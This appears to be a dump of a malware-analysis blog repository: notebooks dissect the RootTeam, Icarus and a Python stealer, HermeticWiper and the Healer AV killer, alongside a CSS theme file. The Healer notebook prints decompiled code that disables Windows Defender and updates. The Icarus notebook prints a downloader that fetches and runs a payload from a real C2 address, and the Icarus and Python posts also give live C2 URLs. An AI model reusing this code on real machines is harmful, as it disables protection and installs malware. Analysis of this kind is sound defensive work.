42 | "## Delivery\n",
43 | "\n",
44 | "### Stage 1 - Setup.zip\n",
45 | "\n",
46 | "\n",
47 | "The sample poses as free software and is delivered via a password encrypted ZIP file. The password provided is `2023`. To infect themselves the victim must first download the sample then unzip it using the provided password and then launch the unzipped `Setup.exe` file. \n",
48 | "\n",
49 | "- **Setup.zip** `88a44f77d9216b4c285329f5f13bcd948bca61e1b9bb4dafb541cc6ea68ce311`\n",
50 | "- **Setup.exe** `9de0dfcf9baf669811374d2f6ed0a1182df8d0254cd210f6f2883c659014de5a` [Malshare](https://malshare.com/sample.php?action=detail&hash=9de0dfcf9baf669811374d2f6ed0a1182df8d0254cd210f6f2883c659014de5a)\n",
51 | "\n",
52 | "### Stage 2 - Shellcode\n",
53 | "The `Setup.exe` PE file has a resource named `OUTPUT_BIN` that contains shellcode and the encrypted stealer payload. The shellcode has 2 stages. The first is a simple obfuscation function that decrypts the second stage. The second stage is an XOR decryption loop the decrypts the final payload.\n",
54 | "\n",
55 | "### UPX Payload\n",
56 | "The decrypted payload is also UPX packed. Once unpacked the final RootTeam stealer is revealed.\n",
57 | "\n",
58 | "## Analysis\n",
59 | "\n",
60 | "[`e0cd16b3de1f8b6c91b3483e383199f691e935d3d4e1ed9e77f6f9aea929b68b`](https://www.unpac.me/results/cbdc661a-953b-44f7-9e13-0358416a2448)\n",
61 | "\n",
62 | "The stealer method names and strings can be recovered using the IDA GO tool [go_parser](https://github.com/0xjiayu/go_parser). Once recovered the functionally of the stealer can be determined based on the stealer function names prefixed by `RootTeamStl_`. The strings are in plaintext including the C2 URLs.\n",
63 | "\n",
64 | "- `http[:]//5.42.66[.]26/api/report`\n",
65 | "- `http[:]//5.42.66[.]26/upload/`\n"
66 | ]
67 | },
68 | {
69 | "cell_type": "code",
70 | "execution_count": null,
71 | "id": "bbf8b1eb-0377-4620-b10f-3db05953a799",
72 | "metadata": {},
73 | "outputs": [],
74 | "source": []
75 | }
76 | ],
77 | "metadata": {
78 | "kernelspec": {
79 | "display_name": "Python 3",
80 | "language": "python",
81 | "name": "python3"
82 | },
83 | "language_info": {
84 | "codemirror_mode": {
85 | "name": "ipython",
86 | "version": 3
87 | },
88 | "file_extension": ".py",
89 | "mimetype": "text/x-python",
90 | "name": "python",
91 | "nbconvert_exporter": "python",
92 | "pygments_lexer": "ipython3",
93 | "version": "3.9.5"
94 | }
95 | },
96 | "nbformat": 4,
97 | "nbformat_minor": 5
98 | }
99 |
--------------------------------------------------------------------------------
/_sass/minima/fastpages-dracula-highlight.scss:
--------------------------------------------------------------------------------
1 | // Override Syntax Highlighting In Minima With the Dracula Theme: https://draculatheme.com/
2 | // If you wish to override any of this CSS, do so in _sass/minima/custom-styles.css
3 |
4 | $dt-gray-dark: #282a36; // Background
5 | $dt-code-cell-background: #323443;
6 | $dt-gray: #44475a; // Current Line & Selection
7 | $dt-gray-light: #f8f8f2; // Foreground
8 | $dt-blue: #6272a4; // Comment
9 | $dt-cyan: #8be9fd;
10 | $dt-green: #50fa7b;
11 | $dt-orange: #ffb86c;
12 | $dt-pink: #ff79c6;
13 | $dt-purple: #bd93f9;
14 | $dt-red: #ff5555;
15 | $dt-yellow: #f1fa8c;
16 | $dt-green-light: rgb(172, 229, 145);
17 |
18 | .language-python + .language-plaintext {
19 | border-left: 1px solid grey;
20 | margin-left: 1rem !important;
21 | }
22 |
23 | // ensure dark background for code in markdown
24 | [class^="language-"]:not(.language-plaintext) pre,
25 | [class^="language-"]:not(.language-plaintext) code {
26 | background-color: $dt-code-cell-background !important;
27 | color: $dt-gray-light;
28 | }
29 |
30 | .language-python + .language-plaintext code { background-color: white !important; }
31 | .language-python + .language-plaintext pre { background-color: white !important; }
32 |
33 | // for Jupyter Notebook HTML Code Cells modified from https://www.fast.ai/public/css/hyde.css
34 |
35 | .input_area pre, .input_area div {
36 | margin-bottom:1.0rem !important;
37 | margin-top:1.5rem !important;
38 | padding-bottom:0 !important;
39 | padding-top:0 !important;
40 | background: #323443 !important;
41 | -webkit-font-smoothing: antialiased;
42 | text-rendering: optimizeLegibility;
43 | font-family: Menlo, Monaco, Consolas, "Lucida Console", Roboto, Ubuntu, monospace;
44 | border-radius: 5px;
45 | font-size: 105%;
46 | }
47 | .output_area pre, .output_area div {
48 | margin-bottom:1rem !important;
49 | margin-top:0rem !important;
50 | padding-bottom:0 !important;
51 | padding-top:0 !important;
52 | }
53 | .input_area pre {
54 | border-left: 1px solid lightcoral;
55 | }
56 | .output_area pre {
57 | border-left: 1px solid grey;
58 | margin-left: 1rem !important;
59 | font-size: 16px;
60 | }
61 |
62 | .code_cell table { width: auto; }
63 |
64 | /* Dracula Theme v1.2.5
65 | *
66 | * https://github.com/zenorocha/dracula-theme
67 | *
68 | * Copyright 2016, All rights reserved
69 | *
70 | * Code licensed under the MIT license
71 | *
72 | */
73 |
74 | .highlight {
75 | background: $dt-code-cell-background !important;
76 | color: $dt-gray-light !important;
77 | pre, code {
78 | background: $dt-code-cell-background;
79 | color: $dt-gray-light;
80 | font-size: 110%;
81 | }
82 |
83 | .hll,
84 | .s,
85 | .sa,
86 | .sb,
87 | .sc,
88 | .dl,
89 | .sd,
90 | .s2,
91 | .se,
92 | .sh,
93 | .si,
94 | .sx,
95 | .sr,
96 | .s1,
97 | .ss {
98 | color:rgb(231, 153, 122);
99 | }
100 |
101 | .go {
102 | color: $dt-gray;
103 | }
104 |
105 | .err,
106 | .g,
107 | .l,
108 | .n,
109 | .x,
110 | .ge,
111 | .gr,
112 | .gh,
113 | .gi,
114 | .gp,
115 | .gs,
116 | .gu,
117 | .gt,
118 | .ld,
119 | .no,
120 | .nd,
121 | .pi,
122 | .ni,
123 | .ne,
124 | .nn,
125 | .nx,
126 | .py,
127 | .w,
128 | .bp {
129 | color: $dt-gray-light;
130 | background-color: $dt-code-cell-background !important;
131 | }
132 |
133 | .p {
134 | font-weight: bold;
135 | color: rgb(102, 217, 239);
136 | }
137 |
138 | .ge {
139 | text-decoration: underline;
140 | }
141 |
142 | .bp {
143 | font-style: italic;
144 | }
145 |
146 | .c,
147 | .ch,
148 | .cm,
149 | .cpf,
150 | .cs {
151 | color: $dt-blue;
152 | }
153 |
154 | .c1 {
155 | color: gray;
156 | }
157 |
158 | .kd,
159 | .kt,
160 | .nb,
161 | .nl,
162 | .nv,
163 | .vc,
164 | .vg,
165 | .vi,
166 | .vm {
167 | color: $dt-cyan;
168 | }
169 |
170 | .kd,
171 | .nb,
172 | .nl,
173 | .nv,
174 | .vc,
175 | .vg,
176 | .vi,
177 | .vm {
178 | font-style: italic;
179 | }
180 |
181 | .fm,
182 | .na,
183 | .nc,
184 | .nf
185 | {
186 | color: $dt-green-light;
187 | }
188 |
189 | .k,
190 | .o,
191 | .cp,
192 | .kc,
193 | .kn,
194 | .kp,
195 | .kr,
196 | .nt,
197 | .ow {
198 | color: $dt-pink;
199 | }
200 |
201 | .kc {
202 | color: $dt-green-light;
203 | }
204 |
205 | .m,
206 | .mb,
207 | .mf,
208 | .mh,
209 | .mi,
210 | .mo,
211 | .il {
212 | color: $dt-purple;
213 | }
214 |
215 | .gd {
216 | color: $dt-red;
217 | }
218 | }
219 |
220 | p code{
221 | font-size: 19px;
222 | }
223 |
--------------------------------------------------------------------------------
/_notebooks/2024-08-26-python-hunting.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "id": "53ed2cff-3881-41d1-9985-2b40bfd4e4de",
6 | "metadata": {},
7 | "source": [
8 | "# Python Hunting\n",
9 | "> Triaging this unknown python stealer with some breakpoints\n",
10 | "- toc: true \n",
11 | "- badges: true\n",
12 | "- categories: [python,triage,x64dbg]"
13 | ]
14 | },
15 | {
16 | "cell_type": "markdown",
17 | "id": "ad232a20-5fad-4d03-8cf9-0570891b2de0",
18 | "metadata": {},
19 | "source": [
20 | "## Overview\n",
21 | "\n",
22 | "We are going to be analyzing an unknown python stealer that comes bundled as a pyinstaller. Initially we took the standard static approach of extracting and decompiling the python code but the decompiler did not fully work (python version 3.11) and the python code was heavily obfuscated. Normally we would use a trick of replacing `eval` and `exec` with `print` statements in the python runtime as a way to simply deobfuscate the script but the fact that it was not correctly decompiled makes this difficult. Instead we are going to approach it dynamically.\n",
23 | "\n",
24 | "### References\n",
25 | "\n",
26 | "- PyInstaller Extractor [link](https://github.com/pyinstxtractor/pyinstxtractor-ng) \n",
27 | "- Python Decompiler [pylingual](https://pylingual.io/)\n",
28 | "- Nice githug search interface [grep.app](https://grep.app/)\n",
29 | "\n",
30 | "### Sample\n",
31 | "`2a19ba63e85ce75d5f2d884011dfc94f616b176ed89a67c1acc0fe2179e8b591` [UnpacMe](https://www.unpac.me/results/c26745bc-501a-45dc-832a-a1c0ed6ab086)"
32 | ]
33 | },
34 | {
35 | "cell_type": "markdown",
36 | "id": "c4beff41-8fd5-4afb-9909-e940a0977d1f",
37 | "metadata": {},
38 | "source": [
39 | "## Analysis\n",
40 | "\n",
41 | "- First extracting the pyinstaller we can see that the main python file is called `mPSCzi.pyc` and the bundled python dll is python 3.11\n",
42 | "- Decompiling with pylingual show us the obfuscated code (snip below)\n",
43 | "\n",
44 | "```python\n",
45 | "strpjab = tvnboaswivayssk - sjeqavagljouxg\n",
46 | "tzvzwyilyuilob = fmikzvuexqgiygyrsw - laswhphcwhrgd\n",
47 | "nvpvfxkszm = tvxzshhdfwer * tvnboaswivayssk\n",
48 | "mxszwtywur = stzhmggz - mguyywdexiw\n",
49 | "eval(bmurybzixs('d3NqcmN3Z3JweGlrYXp6biArIGpsc2h6cmlndCArIG92Z2hjZ3JpZ2JicCArIHh3Y3l1d3hmdnRlICsgZnl5bGp4eGV0ICsgYWZtanVwb2V3ICsgamZ5cG5mciArIGxhc3docGhjd2hyZ2QgKyBwZ3Z0YWp4ZWl5YWxyZyArIHN0emhtZ2d6ICsgc2plcWF2YWdsam91eGcgKyB0dnh6c2hoZGZ3ZXIgKyBnZXZzem9lcHpmd3B4YSArIG5saWxkdWliYnpuICsgbndiaHFobWZlcmZ6ZnV1ICsgdnV4Y2h5a3RuICsgenJvdXRndmdoY2FxbXJzYXUgKyB0dm5ib2Fzd2l2YXlzc2sgKyBmbWlrenZ1ZXhxZ2l5Z3lyc3cgKyB3d2l0ZG55ZyArIG1ndXl5d2RleGl3').decode())\n",
50 | "```\n",
51 | "\n",
52 | "### Dynamic Analysis\n",
53 | "Our dynamic approach will be to directly load the compiled script using the regular python interpreter instead of the pysintaller binary. This will allow us to load symbols for the python dll and attach to it with a debugger. Using the debugger we will break on the function `PyParser_ASTFromString` which is the internal method used for dynamically compiling python called by `eval` and `exec`.\n",
54 | "\n",
55 | "- Dumping the strings from the python 3.11 dll we can see the specific version is 3.11.9\n",
56 | "- We need the install the exact version so that we can run the compiled `mPSCzi.pyc` file\n",
57 | "- We can then add a break point on `PyParser_ASTFromString` and add a log command in the breakpoint to log the first argument (the python code) `{s:utf8(rcx, A00000)}` \n",
58 | "- With this we can then see all of the evaled code is then dumped into the log\n",
59 | "\n",
60 | "The dumped code can be found here [pastebin](https://pastebin.com/6Bki1aRC)\n"
61 | ]
62 | },
63 | {
64 | "cell_type": "markdown",
65 | "id": "099e1532-8816-4a9e-9b93-61a04aec247f",
66 | "metadata": {},
67 | "source": [
68 | "### Final Stage C2s\n",
69 | "The final stage is also obfuscated but parts of the code can be run to deobfuscate it dynamically. "
70 | ]
71 | },
72 | {
73 | "cell_type": "code",
74 | "execution_count": 3,
75 | "id": "5b1f3f72-3c99-45e7-b308-98861a82cd87",
76 | "metadata": {},
77 | "outputs": [
78 | {
79 | "name": "stdout",
80 | "output_type": "stream",
81 | "text": [
82 | "https://mgststudio.shop/sunrise\n",
83 | "https://mgststudio.shop/luminous\n"
84 | ]
85 | }
86 | ],
87 | "source": [
88 | "\n",
89 | "import base64\n",
90 | "\n",
91 | "ZWHmjDkfVvkVdclV = 'bWdzdHN0dWRpby5zaG9w'\n",
92 | "RYBTeAeZbiUOxeloi = base64.b64decode(ZWHmjDkfVvkVdclV).decode()\n",
93 | "\n",
94 | "print(f'https://{RYBTeAeZbiUOxeloi}/sunrise')\n",
95 | "print(f'https://{RYBTeAeZbiUOxeloi}/luminous')"
96 | ]
97 | },
98 | {
99 | "cell_type": "code",
100 | "execution_count": null,
101 | "id": "4f90197f-920b-4dd3-a8e5-72cbfbefddae",
102 | "metadata": {},
103 | "outputs": [],
104 | "source": []
105 | }
106 | ],
107 | "metadata": {
108 | "kernelspec": {
109 | "display_name": "Python 3",
110 | "language": "python",
111 | "name": "python3"
112 | },
113 | "language_info": {
114 | "codemirror_mode": {
115 | "name": "ipython",
116 | "version": 3
117 | },
118 | "file_extension": ".py",
119 | "mimetype": "text/x-python",
120 | "name": "python",
121 | "nbconvert_exporter": "python",
122 | "pygments_lexer": "ipython3",
123 | "version": "3.9.5"
124 | }
125 | },
126 | "nbformat": 4,
127 | "nbformat_minor": 5
128 | }
129 |
--------------------------------------------------------------------------------
/_notebooks/2022-02-27-hermetic_wiper.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "id": "09f4393e-183a-4705-843a-729401a0f1c9",
6 | "metadata": {},
7 | "source": [
8 | "# Hermetic Wiper Malware\n",
9 | "> Analysis of the wiper malware using in the Ukrainian cyber attacks\n",
10 | "\n",
11 | "- toc: true \n",
12 | "- badges: true\n",
13 | "- categories: [hermetic,hermetic wiper,wiper,malware,APT]"
14 | ]
15 | },
16 | {
17 | "cell_type": "markdown",
18 | "id": "03750185-dad2-47ce-bd7f-2aca039b3ce7",
19 | "metadata": {},
20 | "source": [
21 | "## Overview\n",
22 | "\n",
23 | "Sample: `1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591`\n",
24 | "\n",
25 | "\n",
26 | "Sample 2: `0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da`\n",
27 | "\n",
28 | "\n",
29 | "## References\n",
30 | "- [Sample on Malshare](https://malshare.com/sample.php?action=detail&hash=1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591)\n",
31 | "- [J. A. Guerrero-Saade Twitter Thread](https://twitter.com/juanandres_gs/status/1496581710368358400?s=20&t=tuoQe510ow0HmQNbEXQimQ)\n",
32 | "- [ESET Twitter Thread](https://twitter.com/ESETresearch/status/1496581903205511181?s=20&t=tuoQe510ow0HmQNbEXQimQ)\n",
33 | "- [CrowdStrike Blog](https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/)\n",
34 | "- [SentinalOne Blog](https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/)\n",
35 | "\n",
36 | "## Backstory\n",
37 | "- Wiper binary is signed using a code signing certificate issued to Wiper binary is signed using a code signing certificate issued to **Hermetica Digital Ltd** \n",
38 | "- Wiper abuses legitimate drivers from the **EaseUS Partition Master**\n",
39 | "- Modifying CrashControl regkey, [CrashDumpEnabled](https://docs.microsoft.com/en-us/windows/client-management/system-failure-recovery-options#under-write-debugging-information) key to 0\n",
40 | "- Enumerating PhysicalDrives up to 100 - can you even have 100 drives??\n",
41 | "\n",
42 | "\n",
43 | "## Abused Legit Drivers\n",
44 | "The following legit drivers are stored in the resources section of the PE. They are compressed.\n",
45 | "- RCDATA_DRV_X64 (mscompress) e5f3ef69a534260e899a36cec459440dc572388defd8f1d98760d31c700f42d5\n",
46 | "- RCDATA_DRV_X86 (mscompress) b01e0c6ac0b8bcde145ab7b68cf246deea9402fa7ea3aede7105f7051fe240c1\n",
47 | "- RCDATA_DRV_XP_X64 (mscompress) b6f2e008967c5527337448d768f2332d14b92de22a1279fd4d91000bb3d4a0fd\n",
48 | "- RCDATA_DRV_XP_X86 (mscompress) fd7eacc2f87aceac865b0aa97a50503d44b799f27737e009f91f3c281233c17d\n"
49 | ]
50 | },
51 | {
52 | "cell_type": "markdown",
53 | "id": "7158910a-c7be-4517-83a0-8b0c9fc1d588",
54 | "metadata": {},
55 | "source": [
56 | "## Reversing Notes\n",
57 | "\n",
58 | "Arg1 is a sleep before reboot (in minutes)\n",
59 | "Arg2 is sleep before ??? (minutes minus the arg1 sleep)\n",
60 | "\n",
61 | "Grants itself `SeBackupPrivilege`, and `SeShutdownPrivilege`. [Note](https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/privileges), `SeBackupPrivilege` allows file content retrieval, even if the security descriptor on the file might not grant such access. \n",
62 | "\n",
63 | "\n",
64 | "If the host is Windows Vista and above they use one set of drivers (64/32bit). For XP they use a different set of drivers (32/64bit).\n",
65 | "\n",
66 | "Dissable crashdump using reg key `SYSTEM\\\\CurrentControlSet\\\\Control\\\\CrashControl\\\\CrashDumpEnabled`\n",
67 | "\n",
68 | "Possible driver communication via named pipe `\\\\.\\EPMNTDRV\\0`\n",
69 | "\n",
70 | "Write the driver from resource to `\\??\\c:\\Windows\\system32\\Drivers` as an mscompress file. Then copy and decompress it to another file with the same name and a `.sys` file extension. Then grant `SeLoadDriverPrivilege` priviledges to self and load driver.\n",
71 | "\n",
72 | "\n"
73 | ]
74 | },
75 | {
76 | "cell_type": "code",
77 | "execution_count": 3,
78 | "id": "9e0c7b94-4bd3-4410-8261-aa47b6168b09",
79 | "metadata": {},
80 | "outputs": [
81 | {
82 | "name": "stdout",
83 | "output_type": "stream",
84 | "text": [
85 | "DWORD d0;\n",
86 | "DWORD d4;\n",
87 | "DWORD d8;\n",
88 | "DWORD d12;\n",
89 | "DWORD d16;\n",
90 | "DWORD d20;\n",
91 | "DWORD d24;\n",
92 | "DWORD d28;\n",
93 | "DWORD d32;\n",
94 | "DWORD d36;\n",
95 | "DWORD d40;\n"
96 | ]
97 | }
98 | ],
99 | "source": [
100 | "for i in range(0,41,4):\n",
101 | " print(f\"DWORD d{i};\")"
102 | ]
103 | },
104 | {
105 | "cell_type": "markdown",
106 | "id": "b7f621fc-5987-4c1f-9c40-03fda696c3a0",
107 | "metadata": {},
108 | "source": [
109 | "\n",
110 | "\n"
111 | ]
112 | },
113 | {
114 | "cell_type": "code",
115 | "execution_count": null,
116 | "id": "d13df182-c0ab-42ac-a231-09e0f4ed376f",
117 | "metadata": {},
118 | "outputs": [],
119 | "source": []
120 | }
121 | ],
122 | "metadata": {
123 | "kernelspec": {
124 | "display_name": "Python 3",
125 | "language": "python",
126 | "name": "python3"
127 | },
128 | "language_info": {
129 | "codemirror_mode": {
130 | "name": "ipython",
131 | "version": 3
132 | },
133 | "file_extension": ".py",
134 | "mimetype": "text/x-python",
135 | "name": "python",
136 | "nbconvert_exporter": "python",
137 | "pygments_lexer": "ipython3",
138 | "version": "3.9.5"
139 | }
140 | },
141 | "nbformat": 4,
142 | "nbformat_minor": 5
143 | }
144 |
--------------------------------------------------------------------------------
/_notebooks/2023-03-15-healer-avkiller.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "id": "8dae9330-7737-4619-ab01-aae0df9a38d4",
6 | "metadata": {},
7 | "source": [
8 | "# Healer AVKiller\n",
9 | "> Simple .NET hack tool used to kill AV\n",
10 | "\n",
11 | "- toc: true \n",
12 | "- badges: true\n",
13 | "- categories: [healer,avkiller,dotnet,TrustedInstaller]\n"
14 | ]
15 | },
16 | {
17 | "cell_type": "markdown",
18 | "id": "800466b9-894c-4b15-8c37-001673a43cdc",
19 | "metadata": {},
20 | "source": [
21 | "## Overview\n",
22 | "\n",
23 | "This small .NET hacking tool is often deployed along side Redline Stealer and is used to disable antivirus.\n",
24 | "\n",
25 | "## Samples\n",
26 | "\n",
27 | "- 976ba54ff3f8ab4c1d6fe5629460b1fc42106495ddb3151b52951030069b6d47 [UnpacMe Analysis](https://www.unpac.me/results/919f2d1b-4622-4070-b634-adffffa4daf8?hash=976ba54ff3f8ab4c1d6fe5629460b1fc42106495ddb3151b52951030069b6d47)\n",
28 | "- 850cd190aaeebcf1505674d97f51756f325e650320eaf76785d954223a9bee38 [UnpacMe Analysis](https://www.unpac.me/results/2950bddb-dba3-45a5-b00a-ed7e74c42495?hash=850cd190aaeebcf1505674d97f51756f325e650320eaf76785d954223a9bee38)\n",
29 | "- a4f91172441b827b1e0cc6d7fb58d904fb5dd3bca64f08be24c431db2fdcca6d [UnpacMe Analysis](https://www.unpac.me/results/99280669-8c9b-40d4-be2c-f088990dbd3b?hash=a4f91172441b827b1e0cc6d7fb58d904fb5dd3bca64f08be24c431db2fdcca6d)\n",
30 | "\n"
31 | ]
32 | },
33 | {
34 | "cell_type": "markdown",
35 | "id": "f4023a69-19ba-472d-bacb-a3ef3d857b60",
36 | "metadata": {},
37 | "source": [
38 | "## Analysis\n",
39 | "\n",
40 | "When launched the binary first elevates to SYSTEM using token impersonation with the `winlogon` token, then it migrates to `TrustedInstaller` using the `TrustedInstaller` service token. \n",
41 | "With `TrustedInstaller` permissions it gains full access to the protected registry keys and services such as those used by Windows Defender. This is a well documented elevation tactic that is decribed in the 2017 blog post [The Art of Becoming TrustedInstaller](https://www.tiraniddo.dev/2017/08/the-art-of-becoming-trustedinstaller.html).\n",
42 | "\n",
43 | "\n",
44 | "### Windows Defender Targets\n",
45 | "The following registry keys and services are dissabled.\n",
46 | "\n",
47 | "```c#\n",
48 | "Program.DisableService(\"WinDefend\");\n",
49 | "Program.RegistryEdit(\"SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Features\", \"TamperProtection\", \"0\");\n",
50 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\", \"DisableAntiSpyware\", \"1\");\n",
51 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\", \"DisableBehaviorMonitoring\", \"1\");\n",
52 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\", \"DisableIOAVProtection\", \"1\");\n",
53 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\", \"DisableOnAccessProtection\", \"1\");\n",
54 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\", \"DisableRealtimeMonitoring\", \"1\");\n",
55 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\", \"DisableScanOnRealtimeEnable\", \"1\");\n",
56 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender Security Center\\\\Notifications\", \"DisableNotifications\", \"1\");\n",
57 | "Program.DisableService(\"wuauserv\");\n",
58 | "Program.DisableService(\"WaaSMedicSvc\");\n",
59 | "Program.DisableService(\"UsoSvc\");\n",
60 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\WindowsUpdate\\\\AU\", \"AUOptions\", \"2\");\n",
61 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\WindowsUpdate\\\\AU\", \"AutoInstallMinorUpdates\", \"0\");\n",
62 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\WindowsUpdate\\\\AU\", \"NoAutoUpdate\", \"1\");\n",
63 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\WindowsUpdate\\\\AU\", \"NoAutoRebootWithLoggedOnUsers\", \"1\");\n",
64 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\WindowsUpdate\\\\AU\", \"UseWUServer\", \"1\");\n",
65 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\WindowsUpdate\", \"DoNotConnectToWindowsUpdateInternetLocations\", \"1\");\n",
66 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\WindowsUpdate\", \"WUStatusServer\", \"server.wsus\");\n",
67 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\WindowsUpdate\", \"WUServer\", \"server.wsus\");\n",
68 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\WindowsUpdate\", \"UpdateServiceUrlAlternate\", \"server.wsus\");\n",
69 | "```\n"
70 | ]
71 | },
72 | {
73 | "cell_type": "code",
74 | "execution_count": null,
75 | "id": "948b4457-f10c-4638-9d1a-e57743e1b4af",
76 | "metadata": {},
77 | "outputs": [],
78 | "source": []
79 | }
80 | ],
81 | "metadata": {
82 | "kernelspec": {
83 | "display_name": "Python 3",
84 | "language": "python",
85 | "name": "python3"
86 | },
87 | "language_info": {
88 | "codemirror_mode": {
89 | "name": "ipython",
90 | "version": 3
91 | },
92 | "file_extension": ".py",
93 | "mimetype": "text/x-python",
94 | "name": "python",
95 | "nbconvert_exporter": "python",
96 | "pygments_lexer": "ipython3",
97 | "version": "3.9.5"
98 | }
99 | },
100 | "nbformat": 4,
101 | "nbformat_minor": 5
102 | }
103 |
--------------------------------------------------------------------------------
/_notebooks/2022-10-09-icarus.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "id": "864a2be1-5cb7-4a72-91e4-286c9b9180c5",
6 | "metadata": {},
7 | "source": [
8 | "# Icarus Stealer - What is it?\n",
9 | "> What is this malware and how does it work\n",
10 | "\n",
11 | "- toc: true \n",
12 | "- badges: true\n",
13 | "- categories: [icarus,yara,config,dotnet]\n"
14 | ]
15 | },
16 | {
17 | "cell_type": "markdown",
18 | "id": "d021f6a6-cb0f-4533-bfcf-3d64a1da8b64",
19 | "metadata": {},
20 | "source": [
21 | ""
22 | ]
23 | },
24 | {
25 | "cell_type": "markdown",
26 | "id": "e7f5580f-94bf-4035-ab1f-31e22507e03c",
27 | "metadata": {},
28 | "source": [
29 | "## Overview\n",
30 | "\n",
31 | "### Samples\n",
32 | "`8e88de63c132f964891dd00501bee5078f27dfcec7ca122f19bd43f9ed933427` [Malware Bazaar](https://bazaar.abuse.ch/sample/8e88de63c132f964891dd00501bee5078f27dfcec7ca122f19bd43f9ed933427/)\n",
33 | "\n",
34 | "### References\n",
35 | "- Malware Sellix [link](https://icarusdevelopment.sellix.io/terms)\n",
36 | "- Karsten twitter [ref](https://twitter.com/struppigel/status/1566685309093511170)\n",
37 | "- They have a tutorial video! [video](https://vimeo.com/730741460?embedded=true&source=vimeo_logo&owner=176036178)\n",
38 | "\n",
39 | "## Analysis"
40 | ]
41 | },
42 | {
43 | "cell_type": "markdown",
44 | "id": "972908c7-cc26-401b-b964-28b51449a082",
45 | "metadata": {},
46 | "source": [
47 | "### C2 \n",
48 | "The URLs are base64 encoded and link back to the c2 server. In this case the url links to a .jpg file which is infact a base64 endcoded PE.\n",
49 | "\n",
50 | "```c#\n",
51 | "private static void StopRootkit()\n",
52 | "{\n",
53 | "\tWebClient webClient = new WebClient();\n",
54 | "\tStream stream = webClient.OpenRead(Encoding.UTF8.GetString(Convert.FromBase64String(\"aHR0cDovLzE5My4zMS4xMTYuMjM5L2NyeXB0L3B1YmxpYy9VcGRhdGVfRG93bmxvYWRzL3JlbW92ZS5qcGc=\")));\n",
55 | "\tStreamReader streamReader = new StreamReader(stream);\n",
56 | "\tstring s = streamReader.ReadToEnd();\n",
57 | "\tbyte[] bytes = Convert.FromBase64String(s);\n",
58 | "\tFile.WriteAllBytes(Path.GetTempPath() + \"\\\\rkd.exe\", bytes);\n",
59 | "\tProcess.Start(Path.GetTempPath() + \"\\\\rkd.exe\");\n",
60 | "\tFile.Delete(Path.GetTempPath() + \"\\\\rkd.exe\");\n",
61 | "}\n",
62 | "```\n",
63 | "\n",
64 | "#### C2 URLs\n",
65 | "- `aHR0cDovLzE5My4zMS4xMTYuMjM5L2NyeXB0L3B1YmxpYy9VcGRhdGVfRG93bmxvYWRzL3JlbW92ZS5qcGc=` -> `http://193.31.116.239/crypt/public/Update_Downloads/remove.jpg`\n",
66 | "- `aHR0cDovLzE5My4zMS4xMTYuMjM5L2NyeXB0L3B1YmxpYy9VcGRhdGVfRG93bmxvYWRzL3J0LmpwZw==` -> `http://193.31.116.239/crypt/public/Update_Downloads/rt.jpg`\n",
67 | "There are more... \n",
68 | "\n",
69 | "### Downloaded Modules\n",
70 | "\n",
71 | "#### remove.jpg \n",
72 | "\n",
73 | "Deletes the rootkit\n",
74 | "\n",
75 | "```c#\n",
76 | "public static void remove()\n",
77 | "{\n",
78 | "\ttry\n",
79 | "\t{\n",
80 | "\t\tbool[] array = new bool[2];\n",
81 | "\t\tarray[0] = true;\n",
82 | "\t\tforeach (bool flag in array)\n",
83 | "\t\t{\n",
84 | "\t\t\tusing (RegistryKey registryKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, flag ? RegistryView.Registry64 : RegistryView.Registry32).OpenSubKey(\"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\", true))\n",
85 | "\t\t\t{\n",
86 | "\t\t\t\tbool flag2 = (registryKey.GetValue(\"AppInit_DLLs\", \"\") as string).Contains(\"r77-\");\n",
87 | "\t\t\t\tif (flag2)\n",
88 | "\t\t\t\t{\n",
89 | "\t\t\t\t\tregistryKey.SetValue(\"AppInit_DLLs\", \"\");\n",
90 | "\t\t\t\t}\n",
91 | "\t\t\t}\n",
92 | "\t\t}\n",
93 | "\t}\n",
94 | "\tcatch (Exception ex)\n",
95 | "\t{\n",
96 | "\t}\n",
97 | "}\n",
98 | "```\n",
